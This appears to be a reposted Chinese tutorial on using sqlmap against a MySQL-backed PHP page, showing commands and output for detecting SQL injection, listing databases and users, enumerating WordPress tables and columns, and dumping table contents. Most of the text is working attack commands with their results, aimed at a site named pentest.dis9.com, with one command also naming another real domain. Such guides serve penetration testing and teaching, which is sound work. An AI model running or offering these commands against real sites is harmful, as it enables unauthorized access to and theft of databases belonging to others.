sqlmap for mysql 中文帮助指南

程序员文章站 2022-03-19 10:25:04

测试是否存在注入点 root@Dis9Team:/tool...

测试是否存在注入点

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://www.2cto.com /sql/news.php?id=1"

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL 5.0.11

[16:42:09] [INFO] Fetched data logged to text files under '/tools/sqlmap/output/pentest.dis9.com'

[*] shutting down at: 16:42:09

root@Dis9Team:/tools/sqlmap#

列出全部的数据库名字

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" --dbs -v 0

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL 5.0.11

[16:43:40] [INFO] read from file '/tools/sqlmap/output/pentest.dis9.com/session': information_schema, mysql, odldb, sql, test

available databases [5]:

[*] information_schema

[*] mysql

[*] odldb

[*] sql

[*] test

[*] shutting down at: 16:43:40

root@Dis9Team:/tools/sqlmap#

–users 列出全部数据库名字

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" --users

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

database management system users [4]:

[*] 'root'@'127.0.0.1'

[*] 'root'@'localhost'

[*] 'root'@'production'

[*] 'sql'@'localhost'

获得某数据库中的全部表

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" -D odldb --tables

Database: odldb

[13 tables]

+--------------------------+

| wp_commentmeta |

| wp_comments |

| wp_eemail_newsletter |

| wp_eemail_newsletter_sub |

| wp_links |

| wp_options |

| wp_postmeta |

| wp_posts |

| wp_term_relationships |

| wp_term_taxonomy |

| wp_terms |

| wp_usermeta |

| wp_users |

+--------------------------+

获得某数据库中的表的字段

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://www.2cto.com /sql/news.php?id=1" -D odldb --tables -T wp_posts --columns

[16:47:54] [INFO] fetching columns for table 'wp_posts' on database 'odldb'

[16:47:54] [INFO] the SQL query used returns 23 entries

Database: odldb

Table: wp_posts

[23 columns]

+-----------------------+---------------------+

| Column | Type |

+-----------------------+---------------------+

| comment_count | bigint(20) |

| comment_status | varchar(20) |

| guid | varchar(255) |

| ID | bigint(20) unsigned |

| menu_order | int(11) |

| ping_status | varchar(20) |

| pinged | text |

| post_author | bigint(20) unsigned |

| post_content | longtext |

| post_content_filtered | text |

| post_date | datetime |

| post_date_gmt | datetime |

| post_excerpt | text |

| post_mime_type | varchar(100) |

| post_modified | datetime |

| post_modified_gmt | datetime |

| post_name | varchar(200) |

| post_parent | bigint(20) unsigned |

| post_password | varchar(20) |

| post_status | varchar(20) |

| post_title | text |

| post_type | varchar(20) |

| to_ping | text |

+-----------------------+---------------------+

获得某表中的全部内容：

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" -D odldb --tables -T wp_links --columns --dump

[16:50:27] [INFO] fetching columns for table 'wp_links' on database 'odldb'

[16:50:27] [INFO] the SQL query used returns 13 entries

[13 entries]

+------------------+---------+------------+--------------------+------------+------------+-------------+----------+----------+-------------+---------------------+---------------------------------------------------------+--------------+

| NULL | 15 | NULL | brk@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://www.dis9.com/.brk/ | Y |

| NULL | 11 | NULL | x1@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://r0ck.org/ | Y |

| NULL | 14 | NULL | ack@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://x73.cc/ | Y |

| NULL | 18 | NULL | ??? | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://www.xiya.org/ | Y |

| NULL | 17 | NULL | D.K@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://www.crackerban.com/ | Y |

| NULL | 10 | NULL | 7h1nkz3r0@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://51root.net/ | Y |

| NULL | 9 | NULL | LaTCue@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://www.nzts.info/sex/ | Y |

| NULL | 19 | NULL | sys0p@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://hi.baidu.com/%BA%CB%D0%C4web%B0%B2%C8%AB/blog/ | Y |

| NULL | 20 | NULL | ????? | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://hi.baidu.com/%D0%DE%C1%B6%D6%D0%B5%C4%C1%F8/home | Y |

| NULL | 12 | NULL | 4ngle@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://www.bu9.org/ | Y |

| NULL | 13 | NULL | Mario@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://www.mario1990.com/ | Y |

| NULL | 16 | NULL | Vim0x0n@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://www.91ri.org/ | Y |

| NULL | 8 | NULL | Sackula@Dis9Team | NULL | 1 | 0 | NULL | NULL | NULL | 0000-00-00 00:00:00 | http://blog.sackula.info/ | Y |

单独列出某字段的数据

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" -D odldb -T wp_links -C link_url --dump

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL 5.0.11

[17:23:48] [INFO] fetching columns 'link_url' entries for table 'wp_links' on database 'odldb'

[17:23:48] [INFO] read from file '/tools/sqlmap/output/pentest.dis9.com/session': 13

[17:23:48] [INFO] the SQL query used returns 13 entries

Database: odldb

Table: wp_links

[13 entries]

+---------------------------------------------------------+

| link_url |

+---------------------------------------------------------+

| http://blog.sackula.info/ |

| http://www.dis9.com/.brk/ |

| http://www.mario1990.com/ |

| http://www.91ri.org/ |

| http://hi.baidu.com/%D0%DE%C1%B6%D6%D0%B5%C4%C1%F8/home |

| http://x73.cc/ |

| http://51root.net/ |

| http://www.crackerban.com/ |

| http://www.nzts.info/sex/ |

| http://r0ck.org/ |

| http://www.xiya.org/ |

| http://hi.baidu.com/%BA%CB%D0%C4web%B0%B2%C8%AB/blog/ |

| http://www.bu9.org/ |

+---------------------------------------------------------+

[17:23:48] [INFO] Table 'odldb.wp_links' dumped to CSV file '/tools/sqlmap/output/pentest.dis9.com/dump/odldb/wp_links.csv'

[17:23:48] [INFO] Fetched data logged to text files under '/tools/sqlmap/output/pentest.dis9.com'

[*] shutting down at: 17:23:48

列出某数据库中的全部数据

root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u "http://pentest.dis9.com/sql/news.php?id=1" --dump -D odldb

自定义线程
root@Dis9Team:/tools/sqlmap# ./sqlmap.py -u “http://pentest.dis9.com/sql/news.php?id=1″ -D odldb -T wp_links -C link_url –dump –threads 10

摘自 http://www.dis9.com/papers/sqlmap-for-mysql-chinese-help-guide.html

上一篇：阿里妈妈常用网站广告位尺寸

下一篇： Linux系统下virtuoso数据库安装与使用详解

sqlmap for mysql 中文帮助指南

测试是否存在注入点

列出全部的数据库名字

–users 列出全部数据库名字

获得某数据库中的全部表

获得某数据库中的表的字段

获得某表中的全部内容：

单独列出某字段的数据

列出某数据库中的全部数据

phpExcel中文帮助手册之常用功能指南